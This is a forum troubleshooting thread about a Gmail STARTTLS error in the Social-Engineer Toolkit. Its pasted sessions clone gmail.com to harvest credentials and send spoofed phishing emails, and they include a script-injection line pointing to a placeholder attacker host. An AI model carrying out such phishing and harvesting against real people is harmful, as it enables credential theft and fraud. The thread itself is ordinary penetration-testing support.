Results 1 to 3 of 3

Thread: SET's Error of Sendmail

  1. #1
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    4

    Default SET's Error of Sendmail

    Hi,
    A Engineering Social Toolkit Error I'm encountering is with sendmail. "Something went wrong, printing the error: (530: '5.7.0 MUST ISSUE A STARTTLS COMMAND FIRST . m5sm1906592pbh.70', 'XXXX@gmail.com')" I am attempting to send with a Gmail account.
    Here are my options.
    Code:
        
        Select from the menu:
    
    1.  Spear-Phishing Attack Vectors
    2.  Website Attack Vectors
    3.  Infectious Media Generator 
    4.  Create a Payload and Listener
    5.  Mass Mailer Attack
    6.  Teensy USB HID Attack Vector
    7.  SMS Spoofing Attack Vector
    8.  Wireless Access Point Attack Vector
    9.  Third Party Modules
    10. Update the Metasploit Framework
    11. Update the Social-Engineer Toolkit
    12. Help, Credits, and About
    13. Exit the Social-Engineer Toolkit
    
    Enter your choice: 2
    
    The Social-Engineer Toolkit "Web Attack" vector is a unique way of 
    utilizing multiple web-based attacks in order to compromise the 
    intended victim. 
    
    Enter what type of attack you would like to utilize.
    
    The Java Applet attack will spoof a Java Certificate and
    deliver a metasploit based payload. Uses a customized 
    java applet created by Thomas Werth to deliver 
    the payload.
    
    The Metasploit browser exploit method will utilize select
    Metasploit browser exploits through an iframe and deliver 
    a Metasploit payload.
    
    The Credential Harvester Method will utilize web cloning
    of a website that has a username and password field and
    harvest all the information posted to the website.
    
    The TabNabbing Method will wait for a user to move to a
    different tab, then refresh the page to something different.
    
    The Man Left in the Middle Attack Method was introduced by
    Kos and utilizes HTTP REFERER's in order to intercept fields
    and harvest data from them. You need to have an already vulnerable
    site and incorporate <script src="http://YOURIP/">. This could either
    be from a compromised site or through XSS.
    
    The web jacking attack method was introduced by white_sheep, Emgent 
    and the Back|Track team. This method utilizes iframe replacements to 
    make the highlighted URL link to appear legitimate however when clicked 
    a window pops up then is replaced with the malicious link. You can edit
    the link replacement settings in the set_config if its too slow/fast.
    
    The multi-attack will add a combination of attacks through the web attack
    menu. For example you can utilize the Java Applet, Metasploit Browser,
    Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
    all at once to see which is successful.
    
    1. The Java Applet Attack Method
    2. The Metasploit Browser Exploit Method
    3. Credential Harvester Attack Method
    4. Tabnabbing Attack Method
    5. Man Left in the Middle Attack Method
    6. Web Jacking Attack Method 
    7. Multi-Attack Web Method
    8. Return to the previous menu
    
    Enter your choice (press enter for default): 3
    
    
    The first method will allow SET to import a list of pre-defined
    web applications that it can utilize within the attack.
    
    The second method will completely clone a website of your choosing
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.
    
    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.
    
    [!] Website Attack Vectors [!]
    
    1. Web Templates
    2. Site Cloner 
    3. Custom Import 
    4. Return to main menu
    
    Enter number (1-4): 2
    
    Email harvester will allow you to utilize the clone capabilities within SET
    to harvest credentials or parameters from a website as well as place them into a report.
    
    
    SET supports both HTTP and HTTPS
    Example: http://www.thisisafakesite.com
    Enter the url to clone: https://gmail.com
    [*] Cloning the website: https://gmail.com[*] This could take a little bit...
    
    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.[*] I have read the above message.[*]
    
    Press {return} to continue.
    
    
    Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.
    Sendmail can take up to three minutes to start FYI.
    Sendmail is set to ON. Would you like to start the server now?
    
    Would you like to start Sendmail yes or no: yes
    Be patient, it takes up to 3-5 minutes to start sometimes.
    Starting sendmail: 
    
    Social Engineer Toolkit Mass E-Mailer
    
    There are two options on the mass e-mailer, the first would
    be to send an email to one individual person. The second option
    will allow you to import a list and send it to as many people as
    you want within that list.
    
    What do you want to do:
    
    1. E-Mail Attack Single Email Address
    2. E-Mail Attack Mass Mailer
    3. Return to main menu.
    
    Enter your choice: 1
    Enter who you want to send email to: xxxx@163.com
    
    What option do you want to use?
    
    1. Use a GMAIL Account for your email attack.
    2. Use your own server or open relay
    
    Enter your choice: 1
    Enter your GMAIL email address: xxxx@gmail.com
    Enter your password for gmail (it will not be displayed back to you): 
    
    Do you want to flag this message/s as high priority? yes or no: yes
    
    Enter the subject of the email: just cc
    
    Do you want to send the message as html or plain?
    
    1. HTML
    2. Plain
    
    Enter your choice (enter for plain): 2
    
    Enter the body of the message, hit return for a new line.
    
    Type your body and enter control+c when you are finished: 192.168.159.21
    Next line of the body: fsdf
    Next line of the body: fasdf
    Next line of the body: ^C
    
    Something went wrong, printing the error: (530, '5.7.0 Must issue a STARTTLS command first. m5sm1906592pbh.70', 'xxxx@gmail.com')
    Anyone else has similar experiences? Thanks
    Last edited by sickness; 04-24-2011 at 12:10 PM.

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET's Error of Sendmail

    You do not need sendmail on to use your GMAIL account and it works over here:

    # SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
    WEBATTACK_EMAIL=ON

    Code:
    What do you want to do:
    
    1. E-Mail Attack Single Email Address
    2. E-Mail Attack Mass Mailer
    3. Return to main menu.
    
    Enter your choice: 1
    Enter who you want to send email to: sick.n3ss416@gmail.com
    
    What option do you want to use?
    
    1. Use a GMAIL Account for your email attack.
    2. Use your own server or open relay
    
    Enter your choice: 1
    Enter your GMAIL email address: sick.n3ss416@gmail.com
    Enter your password for gmail (it will not be displayed back to you):
    
    Do you want to flag this message/s as high priority? yes or no: yes
    
    Enter the subject of the email: Evil_me
    
    Do you want to send the message as html or plain?
    
    1. HTML
    2. Plain
    
    Enter your choice (enter for plain): 2
    
    Enter the body of the message, hit return for a new line.
    
    Type your body and enter control+c when you are finished: Ok this is an evil email!
    Next line of the body: ^C
    
    [*] SET has finished sending the emails. 
    Press <enter> when your all done...
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Just burned his ISO
    Join Date
    Apr 2011
    Posts
    4

    Default 回复: Re: SET's Error of Sendmail

    Thanks a lot

    Quote Originally Posted by sickness View Post
    You do not need sendmail on to use your GMAIL account and it works over here:

    # SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
    WEBATTACK_EMAIL=ON

    Code:
    What do you want to do:
    
    1. E-Mail Attack Single Email Address
    2. E-Mail Attack Mass Mailer
    3. Return to main menu.
    
    Enter your choice: 1
    Enter who you want to send email to: sick.n3ss416@gmail.com
    
    What option do you want to use?
    
    1. Use a GMAIL Account for your email attack.
    2. Use your own server or open relay
    
    Enter your choice: 1
    Enter your GMAIL email address: sick.n3ss416@gmail.com
    Enter your password for gmail (it will not be displayed back to you):
    
    Do you want to flag this message/s as high priority? yes or no: yes
    
    Enter the subject of the email: Evil_me
    
    Do you want to send the message as html or plain?
    
    1. HTML
    2. Plain
    
    Enter your choice (enter for plain): 2
    
    Enter the body of the message, hit return for a new line.
    
    Type your body and enter control+c when you are finished: Ok this is an evil email!
    Next line of the body: ^C
    
    [*] SET has finished sending the emails. 
    Press <enter> when your all done...

Similar Threads

  1. Replies: 5
    Last Post: 12-22-2010, 09:08 AM
  2. telnet - sendmail
    By mekardo in forum Angolo dei Newbie
    Replies: 1
    Last Post: 05-12-2010, 07:37 AM
  3. sendEmail + sendmail trouble
    By CeEe4 in forum OLD Newbie Area
    Replies: 5
    Last Post: 03-07-2010, 01:43 PM
  4. sendmail not working
    By siteprojects in forum OLD BackTrack 4 Software Related Issues
    Replies: 9
    Last Post: 10-30-2009, 11:13 PM
  5. Difficulty with sendmail
    By imported_bulgin in forum OLD BT3final Support
    Replies: 2
    Last Post: 01-14-2009, 05:48 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •